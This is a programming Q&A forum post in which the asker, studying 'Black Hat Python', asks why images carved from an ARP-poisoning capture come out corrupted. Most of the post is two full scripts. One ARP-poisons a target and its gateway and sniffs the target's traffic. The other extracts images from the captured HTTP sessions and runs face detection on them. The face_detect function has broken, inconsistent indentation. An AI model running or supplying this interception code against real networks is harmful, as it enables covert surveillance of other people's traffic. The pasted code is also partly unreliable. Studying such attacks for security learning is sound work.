# Sniffing images with Arp Poisoning

Tags: python, opencv, scapy, arp

I've been studying the book Black Hat Python. In the chapter four there are examples of arp poisoning and extracting images from sniffed packets. I've been trying to test the codes but while I can arp poison and sniff the network traffic of my host machine from the virtual machine that I use, I can't extract images from the generated pcap file. Wireshark can extract the images from the same pcap. Another thing is that the script can successfully extract the images of the pcap file if the traffic belongs to the virtual machine and not the host.

There are some gif files and around ten jpeg files in the pcap. The script only extracts 13 files of which 10 are gif files. I know opencv doesn't support gif but the other 3 jpeg files are corrupted and it doesn't extract the rest of the jpeg files. I get errors like "corrupt jpeg data"

apper.py

```
    from scapy.all import *
    import os
    import sys
    import threading

    interface    = "en1"
    target_ip    = "172.16.1.71"
    gateway_ip   = "172.16.1.254"
    packet_count = 1000
    poisoning    = True

    def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

        # slightly different method using send
        print "[*] Restoring target..."
        send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
        send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

    def get_mac(ip_address):

        responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

        # return the MAC address from a response
        for s,r in responses:
            return r[Ether].src

        return None

    def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
        global poisoning

        poison_target = ARP()
        poison_target.op   = 2
        poison_target.psrc = gateway_ip
        poison_target.pdst = target_ip
        poison_target.hwdst= target_mac

        poison_gateway = ARP()
        poison_gateway.op   = 2
        poison_gateway.psrc = target_ip
        poison_gateway.pdst = gateway_ip
        poison_gateway.hwdst= gateway_mac

        print "[*] Beginning the ARP poison. [CTRL-C to stop]"

        while poisoning:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)

        print "[*] ARP poison attack finished."

        return

    # set our interface
    conf.iface = interface

    # turn off output
    conf.verb  = 0

    print "[*] Setting up %s" % interface

    gateway_mac = get_mac(gateway_ip)

    if gateway_mac is None:
        print "[!!!] Failed to get gateway MAC. Exiting."
        sys.exit(0)
    else:
        print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

    target_mac = get_mac(target_ip)

    if target_mac is None:
        print "[!!!] Failed to get target MAC. Exiting."
        sys.exit(0)
    else:
        print "[*] Target %s is at %s" % (target_ip,target_mac)

    # start poison thread
    poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
    poison_thread.start()

    try:
        print "[*] Starting sniffer for %d packets" % packet_count

        bpf_filter  = "ip host %s" % target_ip
        packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

    except KeyboardInterrupt:
        pass

    finally:
        # write out the captured packets
        print "[*] Writing packets to arper.pcap"
        wrpcap('arper.pcap',packets)

        poisoning = False

        # wait for poisoning thread to exit
        time.sleep(2)

        # restore the network
        restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
        sys.exit(0)
```

pic_carver.py

```
import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "pic_carver/pictures"
faces_directory    = "pic_carver/faces"
pcap_file          = "bhp.pcap"

def face_detect(path,file_name):

        img     = cv2.imread(path)
        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

        if len(rects) == 0:
                return False

        rects[:, 2:] += rects[:, :2]

    # highlight the faces in the image        
    for x1,y1,x2,y2 in rects:
        cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

    cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

        return True

def get_http_headers(http_payload):

    try:
        # split the headers off if it is HTTP traffic
        headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]

        # break out the headers
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers

def extract_image(headers,http_payload):

    image      = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:

            # grab the image type and image body
            image_type = headers['Content-Type'].split("/")[1]

            image = http_payload[http_payload.index("\r\n\r\n")+4:]

            # if we detect compression decompress the image
            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == "gzip":
                        image = zlib.decompress(image,16+zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == "deflate":
                        image = zlib.decompress(image)
            except:
                pass    
    except:
        return None,None

    return image,image_type

def http_assembler(pcap_file):

    carved_images   = 0
    faces_detected  = 0

    a = rdpcap(pcap_file)

    sessions      = a.sessions()    

    for session in sessions:

        http_payload = ""

        for packet in sessions[session]:

            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:

                    # reassemble the stream into a single buffer
                    http_payload += str(packet[TCP].payload)

            except:
                pass

        headers = get_http_headers(http_payload)

        if headers is None:
            continue

        image,image_type = extract_image(headers,http_payload)

        if image is not None and image_type is not None:                

            # store the image
            file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
            fd = open("%s/%s" % (pictures_directory,file_name),"wb")
            fd.write(image)
            fd.close()

            carved_images += 1

            # now attempt face detection
            try:
                result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)

                if result is True:
                    faces_detected += 1
            except:
                pass


    return carved_images, faces_detected


carved_images, faces_detected = http_assembler(pcap_file)

print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected
```

Comment: Have you visually examined the jpgs that Wireshark "successfully" extracted?

Comment: Yes, they are fine, not corrupted.